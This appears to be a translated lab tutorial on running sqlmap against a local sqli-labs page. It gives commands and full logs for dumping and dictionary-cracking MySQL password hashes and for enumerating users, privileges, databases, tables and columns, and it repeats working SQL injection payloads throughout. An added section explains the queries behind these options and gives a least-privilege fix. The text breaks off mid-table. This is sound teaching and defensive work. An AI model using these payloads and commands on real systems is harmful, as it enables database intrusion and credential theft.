[08:14:47] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[08:14:47] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[08:14:47] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[08:14:47] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[08:14:47] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[08:14:47] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[08:14:57] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[08:14:57] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[08:14:57] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[08:14:57] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[08:14:57] [INFO] target URL appears to have 3 columns in query
[08:14:57] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 51 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 2962=2962 AND 'UWCI'='UWCI
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 3197 FROM(SELECT COUNT(*),CONCAT(0x7178716a71,(SELECT (ELT(3197=3197,1))),0x71786a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OKvt'='OKvt
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 7043 FROM (SELECT(SLEEP(5)))bunr) AND 'kqMl'='kqMl
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-5250' UNION ALL SELECT NULL,NULL,CONCAT(0x7178716a71,0x5953556e50546e68664e6b69504356704b4b764a704759624e794e4c5a71584c56624547576b5a66,0x71786a7071)-- -
---
[08:15:00] [INFO] the back-end DBMS is MySQL
[08:15:00] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
[08:15:00] [INFO] testing if current user is DBA
[08:15:00] [INFO] fetching current user
current user is DBA: True
[08:15:00] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 08:15:00 /2020-03-02/
This shows current user is DBA: True, because the current user is root, which has administrator privileges.
Enumerating DBMS user passwords with sqlmap
Parameter:
--passwords
sqlmap first enumerates the users, then enumerates their password hashes.
This feature is of somewhat limited practical use.
Test:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --password
Output:
___
__H__
___ ___[.]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [)] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 08:19:41 /2020-03-02/
[08:19:42] [INFO] resuming back-end DBMS 'mysql'
[08:19:42] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 2962=2962 AND 'UWCI'='UWCI
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 3197 FROM(SELECT COUNT(*),CONCAT(0x7178716a71,(SELECT (ELT(3197=3197,1))),0x71786a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OKvt'='OKvt
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 7043 FROM (SELECT(SLEEP(5)))bunr) AND 'kqMl'='kqMl
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-5250' UNION ALL SELECT NULL,NULL,CONCAT(0x7178716a71,0x5953556e50546e68664e6b69504356704b4b764a704759624e794e4c5a71584c56624547576b5a66,0x71786a7071)-- -
---
[08:19:42] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[08:19:42] [INFO] fetching database users password hashes
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[08:19:48] [INFO] writing hashes to a temporary file 'xxxxx\sqlmaphashes-us74yp3p.txt'
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q]
[08:19:51] [INFO] using hash method 'mysql_passwd'
what dictionary do you want to use?
[1] default dictionary file 'xxxxxx\sqlmapproject-sqlmap-0605f14\data\txt\wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>
[08:20:01] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N]
[08:21:25] [INFO] starting dictionary-based cracking (mysql_passwd)
[08:21:25] [INFO] starting 8 processes
[' for user '08:21:46root] ['FO] cracked password '] current status: 2arxd... -root
[INFO08:21:49] cracked password '] [rootINFO' for user '] current status: 50519... |root'
database management system users password hashes:
[*] xxxxxx [1]:
password hash: *81F5E21E35407D884A6CD4A731AEBFB6XXXXXXXX
clear-text password: xxxxxxxx
[08:22:23] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 08:22:23 /2020-03-02/
Clearly, both the password hash and the original clear-text password were recovered.
Enumerating DBMS users with sqlmap
Parameter:
--users
Retrieves all DBMS users.
Test:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --users
Output:
___
__H__
___ ___[']_____ ___ ___ {1.4.2.31#dev}
|_ -| . [)] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 08:28:07 /2020-03-02/
[08:28:07] [INFO] resuming back-end DBMS 'mysql'
[08:28:07] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 2962=2962 AND 'UWCI'='UWCI
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 3197 FROM(SELECT COUNT(*),CONCAT(0x7178716a71,(SELECT (ELT(3197=3197,1))),0x71786a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OKvt'='OKvt
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 7043 FROM (SELECT(SLEEP(5)))bunr) AND 'kqMl'='kqMl
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-5250' UNION ALL SELECT NULL,NULL,CONCAT(0x7178716a71,0x5953556e50546e68664e6b69504356704b4b764a704759624e794e4c5a71584c56624547576b5a66,0x71786a7071)-- -
---
[08:28:07] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[08:28:07] [INFO] fetching database users
[08:28:07] [INFO] retrieved: ''root'@'localhost''
[08:28:07] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
database management system users [1]:
[*] 'root'@'localhost'
[08:28:08] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 08:28:08 /2020-03-02/
One account was found. It appears 28 times in the log because sqlmap reads grantees from information_schema.USER_PRIVILEGES, one row per privilege (28 for this account, as the next run shows), and de-duplicates them afterwards.
sqlmap: enumerating DBMS privileges
Option:
--privileges
When the current user may read the system tables that hold account information, this option lists the privileges of every DBMS user; from those you can tell which users are administrators.
To list the privileges of one user only, pass -U with the user name; -CU stands for the current user.
Test:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --privileges -U root
Output:
[*] starting @ 08:33:51 /2020-03-02/
[08:33:52] [INFO] resuming back-end DBMS 'mysql'
[08:33:52] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 2962=2962 AND 'UWCI'='UWCI
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 3197 FROM(SELECT COUNT(*),CONCAT(0x7178716a71,(SELECT (ELT(3197=3197,1))),0x71786a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OKvt'='OKvt
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 7043 FROM (SELECT(SLEEP(5)))bunr) AND 'kqMl'='kqMl
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-5250' UNION ALL SELECT NULL,NULL,CONCAT(0x7178716a71,0x5953556e50546e68664e6b69504356704b4b764a704759624e794e4c5a71584c56624547576b5a66,0x71786a7071)-- -
---
[08:33:52] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[08:33:52] [INFO] fetching database users privileges
[08:33:52] [INFO] retrieved: ''root'@'localhost'','SELECT'
[08:33:52] [INFO] retrieved: ''root'@'localhost'','INSERT'
[08:33:52] [INFO] retrieved: ''root'@'localhost'','UPDATE'
[08:33:52] [INFO] retrieved: ''root'@'localhost'','DELETE'
[08:33:52] [INFO] retrieved: ''root'@'localhost'','CREATE'
[08:33:52] [INFO] retrieved: ''root'@'localhost'','DROP'
[08:33:52] [INFO] retrieved: ''root'@'localhost'','RELOAD'
[08:33:52] [INFO] retrieved: ''root'@'localhost'','SHUTDOWN'
[08:33:52] [INFO] retrieved: ''root'@'localhost'','PROCESS'
[08:33:52] [INFO] retrieved: ''root'@'localhost'','FILE'
[08:33:52] [INFO] retrieved: ''root'@'localhost'','REFERENCES'
[08:33:52] [INFO] retrieved: ''root'@'localhost'','INDEX'
[08:33:52] [INFO] retrieved: ''root'@'localhost'','ALTER'
[08:33:52] [INFO] retrieved: ''root'@'localhost'','SHOW DATABASES'
[08:33:52] [INFO] retrieved: ''root'@'localhost'','SUPER'
[08:33:52] [INFO] retrieved: ''root'@'localhost'','CREATE TEMPORARY TABLES'
[08:33:52] [INFO] retrieved: ''root'@'localhost'','LOCK TABLES'
[08:33:52] [INFO] retrieved: ''root'@'localhost'','EXECUTE'
[08:33:52] [INFO] retrieved: ''root'@'localhost'','REPLICATION SLAVE'
[08:33:52] [INFO] retrieved: ''root'@'localhost'','REPLICATION CLIENT'
[08:33:52] [INFO] retrieved: ''root'@'localhost'','CREATE VIEW'
[08:33:52] [INFO] retrieved: ''root'@'localhost'','SHOW VIEW'
[08:33:53] [INFO] retrieved: ''root'@'localhost'','CREATE ROUTINE'
[08:33:53] [INFO] retrieved: ''root'@'localhost'','ALTER ROUTINE'
[08:33:53] [INFO] retrieved: ''root'@'localhost'','CREATE USER'
[08:33:53] [INFO] retrieved: ''root'@'localhost'','EVENT'
[08:33:53] [INFO] retrieved: ''root'@'localhost'','TRIGGER'
[08:33:53] [INFO] retrieved: ''root'@'localhost'','CREATE TABLESPACE'
database management system users privileges:
[*] 'root'@'localhost' (administrator) [28]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TABLESPACE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
[08:33:53] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 08:33:53 /2020-03-02/
This account holds all 28 global privileges, so sqlmap marks it as administrator. Two of them matter most from the attacker's seat: FILE lets the injected query read and write files on the database host (sqlmap's --file-read / --file-write, and the basis of --os-shell on MySQL), and SUPER, SHUTDOWN and CREATE USER give full control of the server. A web application should never connect as this account.
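The queries behind --users, --passwords and --privileges, and the fix for what they reveal, as an added example that is not part of the original post. It is plain MySQL typed into a client on the lab instance (a 5.7-era server, which the sys schema and the '*'-prefixed mysql_native_password hash above indicate), not run through sqlmap. The account 'app'@'localhost', its password placeholder and the choice of sqli-labs' security database as the application's only schema are assumptions for this lab.

```sql
-- Added example, not part of the original post: the queries behind
-- --users, --passwords and --privileges on MySQL 5.7, followed by the
-- least-privilege fix. The account 'app'@'localhost', its password
-- placeholder and the 'security' schema as the app's only data are
-- assumptions for the lab.

-- --users : sqlmap reads GRANTEE from USER_PRIVILEGES, one row per
-- privilege, which is why the log above shows 'root'@'localhost'
-- "retrieved" 28 times before it is de-duplicated to one account.
SELECT DISTINCT grantee FROM information_schema.USER_PRIVILEGES;

-- --privileges -U root : same table, one row per global privilege
SELECT grantee, privilege_type
FROM information_schema.USER_PRIVILEGES
WHERE grantee = "'root'@'localhost'"
ORDER BY privilege_type;

-- --passwords : the hash column (authentication_string in 5.7+,
-- password in older servers)
SELECT user, host, authentication_string FROM mysql.user;

-- Why the dictionary attack above took seconds: mysql_native_password is
-- SHA1(SHA1(password)) with no salt, so a guess costs two SHA1s and one
-- computed hash can be compared against every account at once.
SELECT CONCAT('*', UPPER(SHA1(UNHEX(SHA1('password'))))) AS candidate_hash;
-- +-------------------------------------------+
-- | *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 |
-- +-------------------------------------------+

-- Hardening: give the web application its own account that can only read
-- the tables it serves. An injection through this account cannot read
-- mysql.user, sees only its own rows in USER_PRIVILEGES, and has no FILE
-- privilege for --file-read / --file-write / --os-shell.
CREATE USER 'app'@'localhost' IDENTIFIED BY '<long random password>';
GRANT SELECT ON security.users  TO 'app'@'localhost';
GRANT SELECT ON security.emails TO 'app'@'localhost';

-- Check the result: USAGE only at the global level, SELECT on two tables.
SHOW GRANTS FOR 'app'@'localhost';
SELECT grantee, privilege_type FROM information_schema.USER_PRIVILEGES
WHERE grantee = "'app'@'localhost'";                 -- USAGE
SELECT table_name, privilege_type FROM information_schema.TABLE_PRIVILEGES
WHERE grantee = "'app'@'localhost'";                 -- users, emails: SELECT
```

Rerunning the three sqlmap options against the same URL after the application has been switched to 'app'@'localhost' is the quickest regression check: --users should return only the app account, --passwords should fail to read mysql.user, and --privileges should show USAGE alone.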
二、sqlmap: enumerating information
1. sqlmap: listing database names
Option:
--dbs
Lists the names of all databases.
Test:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --dbs
Output:
[*] starting @ 08:36:22 /2020-03-02/
[08:36:23] [INFO] resuming back-end DBMS 'mysql'
[08:36:23] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 2962=2962 AND 'UWCI'='UWCI
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 3197 FROM(SELECT COUNT(*),CONCAT(0x7178716a71,(SELECT (ELT(3197=3197,1))),0x71786a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OKvt'='OKvt
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 7043 FROM (SELECT(SLEEP(5)))bunr) AND 'kqMl'='kqMl
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-5250' UNION ALL SELECT NULL,NULL,CONCAT(0x7178716a71,0x5953556e50546e68664e6b69504356704b4b764a704759624e794e4c5a71584c56624547576b5a66,0x71786a7071)-- -
---
[08:36:23] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[08:36:23] [INFO] fetching database names
[08:36:23] [INFO] retrieved: 'information_schema'
[08:36:23] [INFO] retrieved: 'challenges'
[08:36:23] [INFO] retrieved: 'demo'
[08:36:23] [INFO] retrieved: 'demo1125'
[08:36:23] [INFO] retrieved: 'demo1204'
[08:36:23] [INFO] retrieved: 'dvwa'
[08:36:23] [INFO] retrieved: 'jingdong'
[08:36:23] [INFO] retrieved: 'mysql'
[08:36:23] [INFO] retrieved: 'performance_schema'
[08:36:23] [INFO] retrieved: 'pythontest'
[08:36:23] [INFO] retrieved: 'security'
[08:36:23] [INFO] retrieved: 'sys'
available databases [12]:
[*] challenges
[*] demo
[*] demo1125
[*] demo1204
[*] dvwa
[*] information_schema
[*] jingdong
[*] mysql
[*] performance_schema
[*] pythontest
[*] security
[*] sys
[08:36:23] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 08:36:23 /2020-03-02/
All databases were listed, both MySQL's own (information_schema, mysql, performance_schema, sys) and the user-created ones.
2. sqlmap: enumerating tables
Options:
--tables
-D <database>
-D selects one database; without it, --tables walks every database the account can see.
Lists table names.
Test:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --tables
Output:
[*] starting @ 08:41:09 /2020-03-02/
[08:41:09] [INFO] resuming back-end DBMS 'mysql'
[08:41:09] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 2962=2962 AND 'UWCI'='UWCI
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 3197 FROM(SELECT COUNT(*),CONCAT(0x7178716a71,(SELECT (ELT(3197=3197,1))),0x71786a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OKvt'='OKvt
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 7043 FROM (SELECT(SLEEP(5)))bunr) AND 'kqMl'='kqMl
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-5250' UNION ALL SELECT NULL,NULL,CONCAT(0x7178716a71,0x5953556e50546e68664e6b69504356704b4b764a704759624e794e4c5a71584c56624547576b5a66,0x71786a7071)-- -
---
[08:41:09] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[08:41:09] [INFO] fetching database names
[08:41:09] [INFO] resumed: 'information_schema'
[08:41:09] [INFO] resumed: 'challenges'
[08:41:09] [INFO] resumed: 'demo'
[08:41:09] [INFO] resumed: 'demo1125'
[08:41:09] [INFO] resumed: 'demo1204'
[08:41:09] [INFO] resumed: 'dvwa'
[08:41:09] [INFO] resumed: 'jingdong'
[08:41:09] [INFO] resumed: 'mysql'
[08:41:09] [INFO] resumed: 'performance_schema'
[08:41:09] [INFO] resumed: 'pythontest'
[08:41:09] [INFO] resumed: 'security'
[08:41:09] [INFO] resumed: 'sys'
[08:41:09] [INFO] fetching tables for databases: 'challenges, demo, demo1125, demo1204, dvwa, information_schema, jingdong, mysql, performance_schema, pythontest, security, sys'
[08:41:10] [INFO] retrieved: 'information_schema','CHARACTER_SETS'
[08:41:10] [INFO] retrieved: 'information_schema','COLLATIONS'
[08:41:10] [INFO] retrieved: 'information_schema','COLLATION_CHARACTER_SET_APPLICABILITY'
...
[08:41:21] [INFO] retrieved: 'sys','x$waits_by_host_by_latency'
[08:41:21] [INFO] retrieved: 'sys','x$waits_by_user_by_latency'
[08:41:21] [INFO] retrieved: 'sys','x$waits_global_by_latency'
Database: information_schema
[61 tables]
+------------------------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| ... |
+------------------------------------------------------+
Database: challenges
[1 table]
+------------------------------------------------------+
| fespr0fqgc |
+------------------------------------------------------+
Database: demo
[32 tables]
+------------------------------------------------------+
| user |
| article |
| bank1 |
| bank2 |
| book |
| class |
| classes |
| demo1 |
| demo2 |
| dept |
| emp |
| login_lg_log |
| login_lg_log_test |
| login_log |
| login_log_hash |
| login_log_hash2 |
| login_log_list |
| login_log_range |
| login_log_range2 |
| money |
| mylock |
| phone |
| staffs |
| students |
| tbla |
| test |
| test1 |
| test2 |
| test3 |
| test4 |
| test_innodb_lock |
| test_memory |
+------------------------------------------------------+
Database: demo1125
[6 tables]
+------------------------------------------------------+
| areas |
| cities |
| classes |
| provinces |
| student |
| v_p_c |
+------------------------------------------------------+
Database: demo1204
[1 table]
+------------------------------------------------------+
| classes |
+------------------------------------------------------+
Database: dvwa
[2 tables]
+------------------------------------------------------+
| guestbook |
| users |
+------------------------------------------------------+
Database: jingdong
[2 tables]
+------------------------------------------------------+
| goods |
| goods_cates |
+------------------------------------------------------+
Database: mysql
[31 tables]
+------------------------------------------------------+
| user |
| columns_priv |
| ... |
| time_zone_transition_type |
+------------------------------------------------------+
Database: performance_schema
[87 tables]
+------------------------------------------------------+
| accounts |
| cond_instances |
| events_stages_current |
| ... |
| variables_by_thread |
+------------------------------------------------------+
Database: security
[4 tables]
+------------------------------------------------------+
| emails |
| referers |
| uagents |
| users |
+------------------------------------------------------+
Database: sys
[101 tables]
+------------------------------------------------------+
| session |
| version |
| host_summary |
| ... |
+------------------------------------------------------+
[08:41:21] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 08:41:21 /2020-03-02/
Restricting the listing to one database:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -D demo1125 --tables
Output:
[*] starting @ 08:47:30 /2020-03-02/
[08:47:30] [INFO] resuming back-end DBMS 'mysql'
[08:47:30] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 2962=2962 AND 'UWCI'='UWCI
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 3197 FROM(SELECT COUNT(*),CONCAT(0x7178716a71,(SELECT (ELT(3197=3197,1))),0x71786a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OKvt'='OKvt
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 7043 FROM (SELECT(SLEEP(5)))bunr) AND 'kqMl'='kqMl
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-5250' UNION ALL SELECT NULL,NULL,CONCAT(0x7178716a71,0x5953556e50546e68664e6b69504356704b4b764a704759624e794e4c5a71584c56624547576b5a66,0x71786a7071)-- -
---
[08:47:30] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[08:47:30] [INFO] fetching tables for database: 'demo1125'
[08:47:30] [INFO] retrieved: 'areas'
[08:47:30] [INFO] retrieved: 'cities'
[08:47:30] [INFO] retrieved: 'classes'
[08:47:30] [INFO] retrieved: 'provinces'
[08:47:30] [INFO] retrieved: 'student'
[08:47:30] [INFO] retrieved: 'v_p_c'
Database: demo1125
[6 tables]
+-----------+
| areas |
| cities |
| classes |
| provinces |
| student |
| v_p_c |
+-----------+
[08:47:30] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 08:47:30 /2020-03-02/
Only the tables of the specified database were enumerated.
3. sqlmap: enumerating table columns
Option:
--columns
Test:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -D demo1125 --tables --columns
Output:
[*] starting @ 08:51:31 /2020-03-02/
[08:51:32] [INFO] resuming back-end DBMS 'mysql'
[08:51:32] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 2962=2962 AND 'UWCI'='UWCI
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 3197 FROM(SELECT COUNT(*),CONCAT(0x7178716a71,(SELECT (ELT(3197=3197,1))),0x71786a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OKvt'='OKvt
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 7043 FROM (SELECT(SLEEP(5)))bunr) AND 'kqMl'='kqMl
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-5250' UNION ALL SELECT NULL,NULL,CONCAT(0x7178716a71,0x5953556e50546e68664e6b69504356704b4b764a704759624e794e4c5a71584c56624547576b5a66,0x71786a7071)-- -
---
[08:51:32] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[08:51:32] [INFO] fetching tables for database: 'demo1125'
[08:51:32] [INFO] resumed: 'areas'
[08:51:32] [INFO] resumed: 'cities'
[08:51:32] [INFO] resumed: 'classes'
[08:51:32] [INFO] resumed: 'provinces'
[08:51:32] [INFO] resumed: 'student'
[08:51:32] [INFO] resumed: 'v_p_c'
Database: demo1125
[6 tables]
+-----------+
| areas |
| cities |
| classes |
| provinces |
| student |
| v_p_c |
+-----------+
[08:51:32] [INFO] fetching columns for table 'areas' in database 'demo1125'
[08:51:32] [INFO] retrieved: 'id','int(5) unsigned'
[08:51:32] [INFO] retrieved: 'pid','int(5) unsigned'
[08:51:32] [INFO] retrieved: 'name','varchar(120)'
[08:51:32] [INFO] retrieved: 'type','tinyint(1)'
[08:51:32] [INFO] fetching columns for table 'cities' in database 'demo1125'
[08:51:32] [INFO] retrieved: 'id','int(11)'
[08:51:32] [INFO] retrieved: 'cityid','char(6)'
[08:51:32] [INFO] retrieved: 'city','varchar(40)'
[08:51:32] [INFO] retrieved: 'provinceid','char(6)'
[08:51:32] [INFO] fetching columns for table 'classes' in database 'demo1125'
[08:51:32] [INFO] retrieved: 'id','int(4)'
[08:51:32] [INFO] retrieved: 'name','varchar(36)'
[08:51:32] [INFO] fetching columns for table 'provinces' in database 'demo1125'
[08:51:32] [INFO] retrieved: 'id','int(11)'
[08:51:32] [INFO] retrieved: 'provinceid','int(11)'
[08:51:32] [INFO] retrieved: 'province','varchar(100)'
[08:51:32] [INFO] fetching columns for table 'student' in database 'demo1125'
[08:51:32] [INFO] retrieved: 'sid','int(4)'
[08:51:32] [INFO] retrieved: 'sname','varchar(36)'
[08:51:32] [INFO] retrieved: 'gid','int(4)'
[08:51:32] [INFO] fetching columns for table 'v_p_c' in database 'demo1125'
[08:51:32] [INFO] retrieved: 'id','int(5) unsigned'
[08:51:32] [INFO] retrieved: 'pid','int(5) unsigned'
[08:51:32] [INFO] retrieved: 'name','varchar(120)'
[08:51:32] [INFO] retrieved: 'type','tinyint(1)'
[08:51:32] [INFO] retrieved: 'cname','varchar(120)'
Database: demo1125
Table: areas
[4 columns]
+--------+-----------------+
| Column | Type |
+--------+-----------------+
| id | int(5) unsigned |
| name | varchar(120) |
| pid | int(5) unsigned |
| type | tinyint(1) |
+--------+-----------------+
Database: demo1125
Table: cities
[4 columns]
+------------+-------------+
| Column | Type |
+------------+-------------+
| city | varchar(40) |
| cityid | char(6) |
| id | int(11) |
| provinceid | char(6) |
+------------+-------------+
Database: demo1125
Table: classes
[2 columns]
+--------+-------------+
